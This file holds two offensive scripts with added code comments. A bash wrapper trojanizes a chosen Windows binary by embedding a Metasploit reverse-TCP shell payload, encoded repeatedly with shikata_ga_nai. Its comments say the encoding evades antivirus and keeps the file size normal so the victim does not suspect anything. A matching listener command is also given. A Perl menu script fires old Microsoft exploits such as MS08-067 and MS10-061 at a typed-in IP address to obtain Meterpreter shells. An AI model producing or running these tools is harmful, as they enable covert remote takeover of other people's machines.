
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp

#!/bin/bash

# Wraps a msfpayload | msfencode pipeline: msfpayload emits a
# windows/shell/reverse_tcp payload for the given LHOST/LPORT in raw form (R),
# and msfencode embeds it into a copy of the supplied binary (-x) using the
# x86/shikata_ga_nai encoder, applied $count times (-c). Output is a PE file
# (-t exe) written under $tdir with the third argument's extension stripped
# and "-out.exe" appended. The commented-out msfcli line at the end is the
# matching multi/handler listener invocation.

# counts to mangle the trojan to avoid av detect

# keep low we want close to normal filesize for user not to suspect anything

count=15

# Argument check looks only at $3 being empty; note a usage error still exits 0.
if [[ -z $3 ]];then

        echo “usage $(basename $0) <revservip> <revservport> <binary filename>”

        echo “to attach to filename_out.exe”

        echo “doesn’t work well for PU binaries, they say”

        exit 0

else

        ip=$1

        port=$2

        bin=$3

        # Directory part of the third argument; reused as the output location.
        tdir=$(dirname $bin)

        echo “encoding ${bin}-out.exe , mangling $count times”

fi

# Raw payload bytes on stdout are piped straight into the encoder.
msfpayload windows/shell/reverse_tcp LHOST=${ip} LPORT=${port} R | \

    msfencode -x “${tdir}/${bin}” -t exe -e x86/shikata_ga_nai -o “${tdir}/${bin%%.*}-out.exe” -c $count

#        msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E

F*ck MS Exploit Menu

# Interactive launcher menu. Prints an ASCII-art banner, pauses, clears the
# screen, then shows the numbered menu under the SploitMenu label. That label
# is the loop target: the top-level `goto SploitMenu;` placed after the first
# sub definition below brings control back here after each dispatch.
print “##############################\n”;

print “#                            #\n”;

print “#   ##### #   #   ##  #  #   #\n”;

print “#   #     #   #  #  # # #    #\n”;

print “#   ####  #   # #     ##     #\n”;

print “#   #     #   #  #  # # #    #\n”;

print “#   #      ###    ##  #  #   #\n”;

print “#                            #\n”;

print “# #    # #   ##  ###    ##   #\n”;

print “# # # ## #  #  # #  #  #  #  #\n”;

print “# #  # # # #     ###  #    # #\n”;

print “# #    # #  #  # #  #  #  #  #\n”;

print “# #    # #   ##  #   #  ##   #\n”;

print “#                            #\n”;

print “#   ##    ##   ##### ######  #\n”;

print “#  #  #  #  #  #        #    #\n”;

print “#   #   #    # ####     #    #\n”;

print “# #  #   #  #  #        #    #\n”;

print “#  ##     ##   #        #    #\n”;

print “#                            #\n”;

print “##############################\n”;

# Both run as shell commands through system(); "clear" assumes a terminal.
system(“sleep 3”);

system(“clear”);

# Loop label; the menu redraws from here after every dispatch.
SploitMenu:

print ” ##################\n”;

print ” #  Exploit Menu  #\n”;

print ” ##################\n”;

print ” 1 - Run MS-08-067 \n”;

print ” 2 - Run MS-10-061 \n”;

print ” 3 - Run MS-03-026 \n”;

print ” 4 - Run MS-04-031 \n”;

print ” 5 - Run MS-07-029 \n”;

print ” 6 - Exit          \n”;

print “—————————-\n”;

print “\n\nCh0mpy-Pwn>”;    

# No `use strict` in this listing, so $choice is a package global. One line is
# read from STDIN, trailing newline included; == numifies it, so "1\n" still
# compares equal to 1, while a line that does not start with a number
# numifies to 0 and matches no entry (the menu simply redraws).
$choice =<STDIN> ;

# Dispatch chain. `&name` with no parentheses calls the sub with the caller's
# current @_ (empty at top level). Each entry is an independent if, so after a
# handler returns the remaining comparisons are still evaluated before the
# goto below runs.
if ($choice==1){&ms08067};

if ($choice==2){&ms10061};

if ($choice==3){&dcom};

if ($choice==4){&netdde};

if ($choice==5){&zonename};

if ($choice==6){&exit};

sub ms08067

{

# Menu entry 1: reads one line from STDIN as the target address and runs the
# Metasploit ms08_067_netapi module via msfcli with a bind_tcp meterpreter
# payload. The line read into $target is interpolated as-is, unvalidated, into
# the command string handed to system(), which runs it through the shell.
print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-08-067 on them and gives you a Meterpreter shell \n”;

print ” Conficker Style liek a baws \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms08_067_netapi RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

# Return to the menu after the dispatch chain. Sub definitions are not
# executed in sequence, so this is the first top-level statement after the
# ifs and always runs; the identical goto lines that follow each later sub
# are therefore never reached.
goto SploitMenu;

sub ms10061

{

# Menu entry 2: same shape as ms08067 but runs the ms10_061_spoolss module.
# $target is one raw line from STDIN, interpolated as-is, unvalidated, into
# the shell command string passed to system().
print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-10-061 on them and gives you a Meterpreter shell \n”;

print ” Owning liek a Stuxnet \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms10_061_spoolss RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

# Never reached: the unconditional goto that follows the first sub definition
# has already sent control back to the menu.
goto SploitMenu;

sub dcom

{

# Menu entry 3: same shape as ms08067 but runs the ms03_026_dcom module.
# $target is one raw line from STDIN, interpolated as-is, unvalidated, into
# the shell command string passed to system().
print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-03-026 on them and gives you a Meterpreter shell \n”;

print ” Dcom vulns… Patch plz lol \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

# Never reached: the unconditional goto that follows the first sub definition
# has already sent control back to the menu.
goto SploitMenu;

sub netdde

{

# Menu entry 4: same shape as ms08067 but runs the ms04_031_netdde module.
# $target is one raw line from STDIN, interpolated as-is, unvalidated, into
# the shell command string passed to system().
print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-04-031 on them and gives you a Meterpreter shell \n”;

print ” moar old vulns… Patch plz lol \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms04_031_netdde RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

# Never reached: the unconditional goto that follows the first sub definition
# has already sent control back to the menu.
goto SploitMenu;

sub zonename

{

# Menu entry 5: same shape as ms08067 but runs the ms07_029_msdns_zonename
# module. $target is one raw line from STDIN, interpolated as-is, unvalidated,
# into the shell command string passed to system().
print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-07-029 on them and gives you a Meterpreter shell \n”;

print ” No idea how this one works bro \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/dcerpc/ms07_029_msdns_zonename RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

# Never reached: the unconditional goto that follows the first sub definition
# has already sent control back to the menu.
goto SploitMenu;

sub exit

{

# Menu entry 6, reached through the explicit `&exit` call in the dispatch
# chain. Declaring a sub named after a builtin does not override the builtin,
# so the bare `exit` below should still resolve to CORE::exit and end the
# process with status 0 rather than recurse.
exit

}